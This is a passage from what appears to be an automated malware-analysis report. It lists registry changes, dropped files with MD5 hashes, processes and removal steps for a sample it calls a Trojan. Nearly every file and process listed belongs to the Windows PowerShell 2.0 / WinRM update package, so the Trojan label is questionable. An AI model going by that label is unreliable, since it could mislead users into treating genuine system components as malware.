"ILDependencies" = "DD EC CC 77 30 C1 FF 61 0A 00 00 00 03 00 00 00"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\30bc7c4f\1d498232]
"8" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\31cfc12a\67e55a12\63\InvertDependencies\182177d0\3319830e]
"5a" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\182177d0\3319830e\5a]
"DisplayName" = "Microsoft.PowerShell.GPowerShell,1.0.0.0,,31bf3856ad364e35"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2ffb0c52\5076361\3\InvertDependencies\182177d0\3319830e]
"5a" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\31cfc12a\67e55a12\63]
"LastModTime" = "EE 5D C6 CF 6D BF D0 01"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\528efda8\4d0ed383\c\InvertDependencies\182177d0\3319830e]
"5a" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\182177d0\3319830e\5a]
"Status" = "0"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\31cfc12a\67e55a12\63]
"DisplayName" = "Microsoft.PowerShell.GPowerShell,1.0.0.0,,31bf3856ad364e35"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5569937f\7809dff3\61\InvertDependencies\182177d0\3319830e]
"5a" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index60]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF FD"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "4A F9 89 37 30 2B A7 89 54 64 64 A5 D1 61 C2 92"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\182177d0\3319830e\5a]
"MVID" = "BE 89 7C E6 CB 7D 25 17 02 86 EA BC EA E9 F4 1E"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\67e63d5c\6\InvertDependencies\30bc7c4f\1d498232]
"8" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6e35940e\3a9b43f3\4\InvertDependencies\182177d0\3319830e]
"5a" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\268e923b\24\InvertDependencies\182177d0\3319830e]
"5a" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"LatestIndex" = "96"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index60]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "209"

The Trojan deletes the following registry key(s):

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5e]

The process mscorsvw.exe:2168 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C5 85 94 52 B4 87 87 83 82 8C 5F F5 5C 13 6C 63"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"

The process mscorsvw.exe:372 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "1B 1B AF 49 9D BB 3E 77 11 05 E0 35 37 10 B2 83"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"

The process mscorsvw.exe:2536 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "6D C1 8A 10 15 BD 2C AC EB B8 1C 44 8C B1 6B 76"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"

The process mscorsvw.exe:2160 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "35 C5 D8 17 65 AE 8C 68 FD A4 DF D9 7A A1 06 2B"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"

The process mscorsvw.exe:516 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C1 D6 07 C7 BF 6E 72 08 7F 79 7C CC 52 AB 95 88"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"

The process wsmanhttpconfig.exe:2476 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "AB C7 56 CF 0B 57 74 55 D7 DE 66 FD E6 6D 07 A5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN\Plugin\Event Forwarding Plugin]
"ConfigXML" = ""

[HKLM\System\CurrentControlSet\Services\HTTP\Parameters\UrlAclInfo]
"http:// :47001/wsman/" = "01 00 04 80 00 00 00 00 00 00 00 00 00 00 00 00"

[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]
"80:TCP" = "80:TCP:*:Enabled:Windows Remote Management - Compatibility Mode (HTTP-In)"

[HKLM\System\CurrentControlSet\Services\HTTP\Parameters\UrlAclInfo]
"https:// :5986/wsman/" = "01 00 04 80 00 00 00 00 00 00 00 00 00 00 00 00"

[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]
"5985:TCP" = "5985:TCP:*:Enabled:Windows Remote Management"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN]
"UpdatedConfig" = "8DB1A22B-013F-4164-9415-A8709C68A97A"

[HKLM\System\CurrentControlSet\Services\HTTP\Parameters\UrlAclInfo]
"http:// :5985/wsman/" = "01 00 04 80 00 00 00 00 00 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN\Plugin\WMI Provider]
"ConfigXML" = ""

The process wsmanhttpconfig.exe:2536 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "2E D6 72 0A 6B BF E6 D6 B1 62 36 93 CA 64 3E C1"

Dropped PE files

MD5 File path
9859a26d5e72bbb0685af813b409d99dc:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\WindowsXP-KB968930-x86-ENG.exe
fc9a05096522bb6d7ceda62ea1707420c:\WINDOWS\$968930Uinstall_KB968930$\PSCustomSetupUtil.exe
35efd8cd6549a4339cb2a28c8cfd6598c:\WINDOWS\$968930Uinstall_KB968930$\PSSetupNativeUtils.exe
a39df582ca051afc8811fbd00db12f10c:\WINDOWS\$968930Uinstall_KB968930$\spuninst\spuninst.exe
9a055da2f2819f155c33d47cd67a7c00c:\WINDOWS\$968930Uinstall_KB968930$\spuninst\updspapi.dll
75c183e262bd4400eb0f20349f6ef383c:\WINDOWS\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management.resources\1.0.0.0_en_31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.resources.dll
2f7fe3a781ba8c0a67c775f20e3e9f70c:\WINDOWS\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll
4e2482e69baaf3a5b13db8101c063ebfc:\WINDOWS\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Diagnostics.resources\1.0.0.0_en_31bf3856ad364e35\Microsoft.PowerShell.Commands.Diagnostics.resources.dll
08e87e8abf7b41b28663dce817ce0ab6c:\WINDOWS\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Diagnostics\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Diagnostics.dll
b87e087fc013225e2aa1cb60c080647dc:\WINDOWS\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management.resources\1.0.0.0_en_31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.resources.dll
f3ac3f844f90380aab2b4c0836c4288fc:\WINDOWS\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll
1ce73fb3f88c716cfc3fd550547d2b35c:\WINDOWS\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility.resources\1.0.0.0_en_31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.resources.dll
dfeb401cc051e5da721c584ff6a90f88c:\WINDOWS\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll
36ff641f37918f2cca98e7f407ac4d75c:\WINDOWS\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost.resources\1.0.0.0_en_31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.resources.dll
3991b7fa452a9c9c291c06365a236792c:\WINDOWS\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll
37bed865557084dd9988350ab1675e0bc:\WINDOWS\assembly\GAC_MSIL\Microsoft.PowerShell.Editor.resources\1.0.0.0_en_31bf3856ad364e35\Microsoft.PowerShell.Editor.resources.dll
208fa9d0ebe2ceb9616042772e96598ec:\WINDOWS\assembly\GAC_MSIL\Microsoft.PowerShell.Editor\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Editor.dll
108500a98b9a2f66823e7615398fc87bc:\WINDOWS\assembly\GAC_MSIL\Microsoft.PowerShell.GPowerShell.resources\1.0.0.0_en_31bf3856ad364e35\Microsoft.PowerShell.GPowerShell.resources.dll
d4eefccdc3de6ced901535fa4153c491c:\WINDOWS\assembly\GAC_MSIL\Microsoft.PowerShell.GPowerShell\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.GPowerShell.dll
5a69fb5d686f863e0e13268d671ef16dc:\WINDOWS\assembly\GAC_MSIL\Microsoft.PowerShell.GraphicalHost.resources\1.0.0.0_en_31bf3856ad364e35\Microsoft.PowerShell.GraphicalHost.resources.dll
3eab4dbdc290edc4d53fe77f1fdb9e59c:\WINDOWS\assembly\GAC_MSIL\Microsoft.PowerShell.GraphicalHost\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.GraphicalHost.dll
c7a0d1321a67a2afd330c5fbe79befd1c:\WINDOWS\assembly\GAC_MSIL\Microsoft.PowerShell.Security.resources\1.0.0.0_en_31bf3856ad364e35\Microsoft.PowerShell.Security.resources.dll
53a9d748ef09920a0d06da2583c298adc:\WINDOWS\assembly\GAC_MSIL\Microsoft.PowerShell.Security\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll
6372ea7d2aced7185183cf3fcdd3577bc:\WINDOWS\assembly\GAC_MSIL\Microsoft.WSMan.Management.resources\1.0.0.0_en_31bf3856ad364e35\Microsoft.WSMan.Management.resources.dll
1a4e900c2fe3cd31d10107670d184fe6c:\WINDOWS\assembly\GAC_MSIL\Microsoft.WSMan.Management\1.0.0.0__31bf3856ad364e35\Microsoft.WSMan.Management.dll
f7da27672d2e4c21a1f996ee31de0dbfc:\WINDOWS\assembly\GAC_MSIL\Microsoft.WSMan.Runtime\1.0.0.0__31bf3856ad364e35\Microsoft.WSMan.Runtime.dll
2286b57ecc2d32d24049c51989084268c:\WINDOWS\assembly\GAC_MSIL\System.Management.Automation.resources\1.0.0.0_en_31bf3856ad364e35\System.Management.Automation.resources.dll
4d8ab4fad244f7985d8c59d456e026d7c:\WINDOWS\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll
930cdc3163f4d4a6bd52f96896e9fa44c:\WINDOWS\assembly\NativeImages_v2.0.50727_32\Microsoft.Backgroun#\fd3edcdfa9ce60abac35208146184495\Microsoft.BackgroundIntelligentTransfer.Management.ni.dll
e27a37cfbcff4c9941e73c9a3e762d0cc:\WINDOWS\assembly\NativeImages_v2.0.50727_32\Microsoft.PowerShel#\13fc3daef585098f11911f8f72ac1cea\Microsoft.PowerShell.Commands.Diagnostics.ni.dll
8984e670f9760c504c5fca8370ad99d3c:\WINDOWS\assembly\NativeImages_v2.0.50727_32\Microsoft.PowerShel#\93926797486d4f7a9b69c5875ff3fc30\Microsoft.PowerShell.Commands.Utility.ni.dll
fe8b145b025e02fb4e23381a2e189d0ac:\WINDOWS\assembly\NativeImages_v2.0.50727_32\Microsoft.PowerShel#\dc19f50c5e84e7223433cc709e7eb43f\Microsoft.PowerShell.ConsoleHost.ni.dll
6756eea89ecbaa301b79e4d01f381cd1c:\WINDOWS\assembly\NativeImages_v2.0.50727_32\Microsoft.PowerShel#\f007ee1bf548ba761ba616f4c35b158e\Microsoft.PowerShell.Commands.Management.ni.dll
85d7ab466d0577c49fc9879107ec7ef5c:\WINDOWS\system32\WindowsPowerShell\v1.0\CompiledComposition.Microsoft.PowerShell.GPowerShell.dll
173d3dd1425a8e33fa1d4ed71067a3a2c:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\BitsTransfer\microsoft.backgroundintelligenttransfer.management.interop.dll
df4217ddb34a0b73dc7aac7829371c0cc:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe
fe7bc06af17d7cd8fb8e6d72d72453b8c:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe.mui
36b6f71b6d7d280302b348145db05a9fc:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell_ise.exe
cb3a534127f37d0fa1f556dbb76575d3c:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell_ise.resources.dll
95b7f12a557dedac5e4a1e9afa5e73abc:\WINDOWS\system32\WindowsPowerShell\v1.0\pspluginwkr.dll
a94243b797377ba03b63fc716c13bcf5c:\WINDOWS\system32\WindowsPowerShell\v1.0\pwrshmsg.dll
7943a80f1a6fd37969aacd411b511f91c:\WINDOWS\system32\WindowsPowerShell\v1.0\pwrshsip.dll
2c9c9ae86eb2b4e78c8e09deb7509a63c:\WINDOWS\system32\WsmAuto.dll
67146d3606be1111a39f0fd61f47e9b6c:\WINDOWS\system32\WsmRes.dll
18f347402da544a780949b8fdf83351bc:\WINDOWS\system32\WsmSvc.dll
296e6992278fea7140d88b603e6c2a8ac:\WINDOWS\system32\WsmWmiPl.dll
8c386819bf5b39d7a4b274d0b55f87a5c:\WINDOWS\system32\pwrshplugin.dll
84e025b1259c66315f4d45a6caecacc9c:\WINDOWS\system32\wevtfwd.dll
cd17705af8e53a82facb545a213ab09cc:\WINDOWS\system32\winrmprov.dll
afdf7654880ce23005014895b129d948c:\WINDOWS\system32\winrs.exe
3e9b11880ae4a8ff399ce0573c82655bc:\WINDOWS\system32\winrscmd.dll
62021e3e6ba13d72cf5cc1047cfac991c:\WINDOWS\system32\winrshost.exe
b84092e52861a026fc83bcede4a7abfac:\WINDOWS\system32\winrsmgr.dll
35bc7c49676e5ab617ef94dc9854a6f1c:\WINDOWS\system32\winrssrv.dll
972916faac89c4aa978952b30f478e81c:\WINDOWS\system32\wsmanhttpconfig.exe
23ce21efc2ae95700f2b1f9582fe3867c:\WINDOWS\system32\wsmplpxy.dll
faa2fcc6853e5123e05dccc5919657e2c:\WINDOWS\system32\wsmprovhost.exe

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

Removals

Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.

Manual removal*

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):

    mofcomp.exe:2556
    WindowsXP-KB968930-x86-ENG.exe:176
    ngen.exe:3900
    ngen.exe:3924
    ngen.exe:3916
    ngen.exe:3496
    ngen.exe:3908
    ngen.exe:3416
    ngen.exe:3536
    ngen.exe:3452
    ngen.exe:3552
    ngen.exe:3576
    ngen.exe:3436
    ngen.exe:3940
    ngen.exe:3488
    ngen.exe:3932
    ngen.exe:3520
    ngen.exe:3528
    ngen.exe:3544
    ngen.exe:3560
    ngen.exe:3428
    ngen.exe:3460
    ngen.exe:3376
    ngen.exe:3568
    ngen.exe:3444
    update.exe:1716
    %original file name%.exe:464
    PSCustomSetupUtil.exe:3592
    PSCustomSetupUtil.exe:2596
    PSCustomSetupUtil.exe:2900
    PSCustomSetupUtil.exe:3776
    PSCustomSetupUtil.exe:3612
    PSCustomSetupUtil.exe:3736
    PSCustomSetupUtil.exe:3164
    PSCustomSetupUtil.exe:3008
    PSCustomSetupUtil.exe:3660
    PSCustomSetupUtil.exe:3124
    PSCustomSetupUtil.exe:2744
    PSCustomSetupUtil.exe:2968
    PSCustomSetupUtil.exe:3080
    PSCustomSetupUtil.exe:2620
    PSCustomSetupUtil.exe:2768
    PSCustomSetupUtil.exe:2876
    PSCustomSetupUtil.exe:2720
    PSCustomSetupUtil.exe:2924
    PSCustomSetupUtil.exe:3708
    PSCustomSetupUtil.exe:3800
    PSCustomSetupUtil.exe:3056
    PSCustomSetupUtil.exe:2836
    PSCustomSetupUtil.exe:3644
    PSCustomSetupUtil.exe:2680
    PSCustomSetupUtil.exe:3032
    PSCustomSetupUtil.exe:3684
    PSSetupNativeUtils.exe:4084
    mscorsvw.exe:2596
    mscorsvw.exe:2432
    mscorsvw.exe:3888
    mscorsvw.exe:2344
    mscorsvw.exe:2052
    mscorsvw.exe:2056
    mscorsvw.exe:1612
    mscorsvw.exe:2248
    mscorsvw.exe:504
    mscorsvw.exe:2504
    mscorsvw.exe:2116
    mscorsvw.exe:2428
    mscorsvw.exe:2440
    mscorsvw.exe:580
    mscorsvw.exe:3588
    mscorsvw.exe:3400
    mscorsvw.exe:3248
    mscorsvw.exe:2316
    mscorsvw.exe:3372
    mscorsvw.exe:2168
    mscorsvw.exe:372
    mscorsvw.exe:2536
    mscorsvw.exe:2160
    mscorsvw.exe:516
    wsmanhttpconfig.exe:2476
    wsmanhttpconfig.exe:2536

  2. Delete the original Trojan file.
  3. Delete or disinfect the following files created/modified by the Trojan:

    %System%\wbem\Logs\mofcomp.log (1814 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\tmpCF.tmp (1 bytes)
    C:\ea6d03fb84304f0031a48a\microsoft.powershell.commands.utility.resources.dll (508 bytes)
    C:\ea6d03fb84304f0031a48a\about_windows_powershell_ise.help.txt (6 bytes)
    C:\ea6d03fb84304f0031a48a\about_logical_operators.help.txt (2 bytes)
    C:\ea6d03fb84304f0031a48a\about_wildcards.help.txt (3 bytes)
    C:\ea6d03fb84304f0031a48a\microsoft.backgroundintelligenttransfer.management.dll-help.xml (2472 bytes)
    C:\ea6d03fb84304f0031a48a\about_requires.help.txt (2 bytes)
    C:\ea6d03fb84304f0031a48a\about_methods.help.txt (6 bytes)
    C:\ea6d03fb84304f0031a48a\about_signing.help.txt (12 bytes)
    C:\ea6d03fb84304f0031a48a\microsoft.wsman.management.resources.dll (13 bytes)
    C:\ea6d03fb84304f0031a48a\microsoft.wsman.management.dll-help.xml (8740 bytes)
    C:\ea6d03fb84304f0031a48a\winrmprov.mof (789 bytes)
    C:\ea6d03fb84304f0031a48a\update\update.inf (2457 bytes)
    C:\ea6d03fb84304f0031a48a\about_automatic_variables.help.txt (14 bytes)
    C:\ea6d03fb84304f0031a48a\about_throw.help.txt (5 bytes)
    C:\ea6d03fb84304f0031a48a\pssetupnativeutils.exe (9 bytes)
    C:\ea6d03fb84304f0031a48a\getevent.types.ps1xml (15 bytes)
    C:\ea6d03fb84304f0031a48a\bitstransfer.format.ps1xml (16 bytes)
    C:\ea6d03fb84304f0031a48a\about_parameters.help.txt (9 bytes)
    C:\ea6d03fb84304f0031a48a\winrscmd.dll (2907 bytes)
    C:\ea6d03fb84304f0031a48a\wsmsvc.dll (15909 bytes)
    C:\ea6d03fb84304f0031a48a\about_types.ps1xml.help.txt (481 bytes)
    C:\ea6d03fb84304f0031a48a\about_eventlogs.help.txt (5 bytes)
    C:\ea6d03fb84304f0031a48a\spmsg.dll (495 bytes)
    C:\ea6d03fb84304f0031a48a\about_ws-management_cmdlets.help.txt (405 bytes)
    C:\$Directory (800 bytes)
    C:\ea6d03fb84304f0031a48a\system.management.automation.dll-help.xml (16567 bytes)
    C:\ea6d03fb84304f0031a48a\about_command_syntax.help.txt (5 bytes)
    C:\ea6d03fb84304f0031a48a\about_format.ps1xml.help.txt (17 bytes)
    C:\ea6d03fb84304f0031a48a\about_command_precedence.help.txt (8 bytes)
    C:\ea6d03fb84304f0031a48a\pwrshmsg.dll (4 bytes)
    C:\ea6d03fb84304f0031a48a\update\kb968930xp.cat (512 bytes)
    C:\ea6d03fb84304f0031a48a\microsoft.powershell.graphicalhost.resources.dll (16 bytes)
    C:\ea6d03fb84304f0031a48a\wsmres.dll (6164 bytes)
    C:\ea6d03fb84304f0031a48a\about_comment_based_help.help.txt (595 bytes)
    C:\ea6d03fb84304f0031a48a\about_assignment_operators.help.txt (379 bytes)
    C:\ea6d03fb84304f0031a48a\about_quoting_rules.help.txt (659 bytes)
    C:\ea6d03fb84304f0031a48a\pwrshsip.dll (24 bytes)
    C:\ea6d03fb84304f0031a48a\wsmprovhost.exe (657 bytes)
    C:\ea6d03fb84304f0031a48a\microsoft.powershell.commands.utility.dll (9684 bytes)
    C:\ea6d03fb84304f0031a48a\about_split.help.txt (10 bytes)
    C:\ea6d03fb84304f0031a48a\about_variables.help.txt (6 bytes)
    C:\ea6d03fb84304f0031a48a\about_providers.help.txt (59 bytes)
    C:\ea6d03fb84304f0031a48a\winrssrv.dll (12 bytes)
    C:\ea6d03fb84304f0031a48a\about_hash_tables.help.txt (6 bytes)
    C:\ea6d03fb84304f0031a48a\about_language_keywords.help.txt (11 bytes)
    C:\ea6d03fb84304f0031a48a\wsmauto.dll (1842 bytes)
    C:\ea6d03fb84304f0031a48a\about_functions_advanced_methods.help.txt (9 bytes)
    C:\ea6d03fb84304f0031a48a\eventforwarding.adm (2 bytes)
    C:\ea6d03fb84304f0031a48a\microsoft.powershell.consolehost.dll-help.xml (900 bytes)
    C:\ea6d03fb84304f0031a48a\winrm.cmd (35 bytes)
    C:\ea6d03fb84304f0031a48a\about_prompts.help.txt (7 bytes)
    C:\ea6d03fb84304f0031a48a\about_script_internationalization.help.txt (9 bytes)
    C:\ea6d03fb84304f0031a48a\about_trap.help.txt (10 bytes)
    C:\ea6d03fb84304f0031a48a\powershellcore.format.ps1xml (1492 bytes)
    C:\ea6d03fb84304f0031a48a\winrmprov.dll (591 bytes)
    C:\ea6d03fb84304f0031a48a\compiledcomposition.microsoft.powershell.gpowershell.dll (1737 bytes)
    C:\ea6d03fb84304f0031a48a\about_locations.help.txt (794 bytes)
    C:\ea6d03fb84304f0031a48a\about_operators.help.txt (770 bytes)
    C:\ea6d03fb84304f0031a48a\about_remote_output.help.txt (887 bytes)
    C:\ea6d03fb84304f0031a48a\about_type_operators.help.txt (5 bytes)
    C:\ea6d03fb84304f0031a48a\about_redirection.help.txt (2 bytes)
    C:\ea6d03fb84304f0031a48a\spupdsvc.exe (287 bytes)
    C:\ea6d03fb84304f0031a48a\about_transactions.help.txt (1011 bytes)
    C:\ea6d03fb84304f0031a48a\about_functions_cmdletbindingattribute.help.txt (3 bytes)
    C:\ea6d03fb84304f0031a48a\microsoft.wsman.runtime.dll (33 bytes)
    C:\ea6d03fb84304f0031a48a\winrm.ini (1956 bytes)
    C:\ea6d03fb84304f0031a48a\update\update.ver (14 bytes)
    C:\ea6d03fb84304f0031a48a\about_join.help.txt (2 bytes)
    C:\ea6d03fb84304f0031a48a\about_continue.help.txt (1 bytes)
    C:\ea6d03fb84304f0031a48a\about_preference_variables.help.txt (37 bytes)
    C:\ea6d03fb84304f0031a48a\about_modules.help.txt (13 bytes)
    C:\ea6d03fb84304f0031a48a\microsoft.backgroundintelligenttransfer.management.resources.dll (7 bytes)
    C:\ea6d03fb84304f0031a48a\help.format.ps1xml (3947 bytes)
    C:\ea6d03fb84304f0031a48a\update\update.exe (10748 bytes)
    C:\ea6d03fb84304f0031a48a\spuninst.exe (3787 bytes)
    C:\ea6d03fb84304f0031a48a\pwrshplugin.dll (802 bytes)
    C:\ea6d03fb84304f0031a48a\windowspowershellhelp.chm (26041 bytes)
    C:\ea6d03fb84304f0031a48a\system.management.automation.resources.dll (3153 bytes)
    C:\ea6d03fb84304f0031a48a\about_jobs.help.txt (12 bytes)
    C:\ea6d03fb84304f0031a48a\microsoft.powershell.commands.diagnostics.dll (998 bytes)
    C:\ea6d03fb84304f0031a48a\update\eula.txt (586 bytes)
    C:\ea6d03fb84304f0031a48a\about_functions_advanced.help.txt (3 bytes)
    C:\ea6d03fb84304f0031a48a\about_pssession_details.help.txt (9 bytes)
    C:\ea6d03fb84304f0031a48a\microsoft.powershell.commands.management.dll-help.xml (28236 bytes)
    C:\ea6d03fb84304f0031a48a\about_do.help.txt (2 bytes)
    C:\ea6d03fb84304f0031a48a\about_special_characters.help.txt (3 bytes)
    C:\ea6d03fb84304f0031a48a\about_line_editing.help.txt (1 bytes)
    C:\ea6d03fb84304f0031a48a\winrs.exe (1154 bytes)
    C:\ea6d03fb84304f0031a48a\about_return.help.txt (3 bytes)
    C:\ea6d03fb84304f0031a48a\about_commonparameters.help.txt (12 bytes)
    C:\ea6d03fb84304f0031a48a\about_properties.help.txt (7 bytes)
    C:\ea6d03fb84304f0031a48a\about_while.help.txt (2 bytes)
    C:\ea6d03fb84304f0031a48a\about_if.help.txt (3 bytes)
    C:\ea6d03fb84304f0031a48a\microsoft.powershell.editor.resources.dll (562 bytes)
    C:\ea6d03fb84304f0031a48a\powershell.exe (7339 bytes)
    C:\ea6d03fb84304f0031a48a\dotnettypes.format.ps1xml (266 bytes)
    C:\ea6d03fb84304f0031a48a\about_break.help.txt (792 bytes)
    C:\ea6d03fb84304f0031a48a\microsoft.powershell.commands.diagnostics.resources.dll (470 bytes)
    C:\ea6d03fb84304f0031a48a\about_remote_jobs.help.txt (13 bytes)
    C:\ea6d03fb84304f0031a48a\wsmtxt.xsl (2 bytes)
    C:\ea6d03fb84304f0031a48a\winrm.vbs (2727 bytes)
    C:\ea6d03fb84304f0031a48a\about_scripts.help.txt (12 bytes)
    C:\ea6d03fb84304f0031a48a\update\updspapi.dll (5940 bytes)
    C:\ea6d03fb84304f0031a48a\about_regular_expressions.help.txt (5 bytes)
    C:\ea6d03fb84304f0031a48a\default.help.txt (2 bytes)
    C:\ea6d03fb84304f0031a48a\about_environment_variables.help.txt (417 bytes)
    C:\ea6d03fb84304f0031a48a\update\spcustom.dll (23 bytes)
    C:\ea6d03fb84304f0031a48a\microsoft.powershell.commands.management.resources.dll (508 bytes)
    C:\ea6d03fb84304f0031a48a\about_functions_advanced_parameters.help.txt (962 bytes)
    C:\ea6d03fb84304f0031a48a\about_profiles.help.txt (457 bytes)
    C:\ea6d03fb84304f0031a48a\microsoft.powershell.gpowershell.dll (9738 bytes)
    C:\ea6d03fb84304f0031a48a\importallmodules.psd1 (438 bytes)
    C:\ea6d03fb84304f0031a48a\about_parsing.help.txt (2 bytes)
    C:\ea6d03fb84304f0031a48a\about_core_commands.help.txt (221 bytes)
    C:\ea6d03fb84304f0031a48a\about_remote_faq.help.txt (775 bytes)
    C:\ea6d03fb84304f0031a48a\about_pssessions.help.txt (9 bytes)
    C:\ea6d03fb84304f0031a48a\wsmwmipl.dll (2816 bytes)
    C:\ea6d03fb84304f0031a48a\winrsmgr.dll (2 bytes)
    C:\ea6d03fb84304f0031a48a\wsmpty.xsl (1 bytes)
    C:\ea6d03fb84304f0031a48a\about_try_catch_finally.help.txt (7 bytes)
    C:\ea6d03fb84304f0031a48a\microsoft.powershell.security.resources.dll (9 bytes)
    C:\ea6d03fb84304f0031a48a\about_foreach.help.txt (10 bytes)
    C:\ea6d03fb84304f0031a48a\about_session_configurations.help.txt (276 bytes)
    C:\ea6d03fb84304f0031a48a\about_history.help.txt (3 bytes)
    C:\ea6d03fb84304f0031a48a\about_for.help.txt (146 bytes)
    C:\ea6d03fb84304f0031a48a\wsmauto.mof (4 bytes)
    C:\ea6d03fb84304f0031a48a\about_path_syntax.help.txt (5 bytes)
    C:\ea6d03fb84304f0031a48a\about_objects.help.txt (2 bytes)
    C:\ea6d03fb84304f0031a48a\microsoft.powershell.commands.utility.dll-help.xml (20810 bytes)
    C:\ea6d03fb84304f0031a48a\powershelltrace.format.ps1xml (344 bytes)
    C:\ea6d03fb84304f0031a48a\about_arithmetic_operators.help.txt (168 bytes)
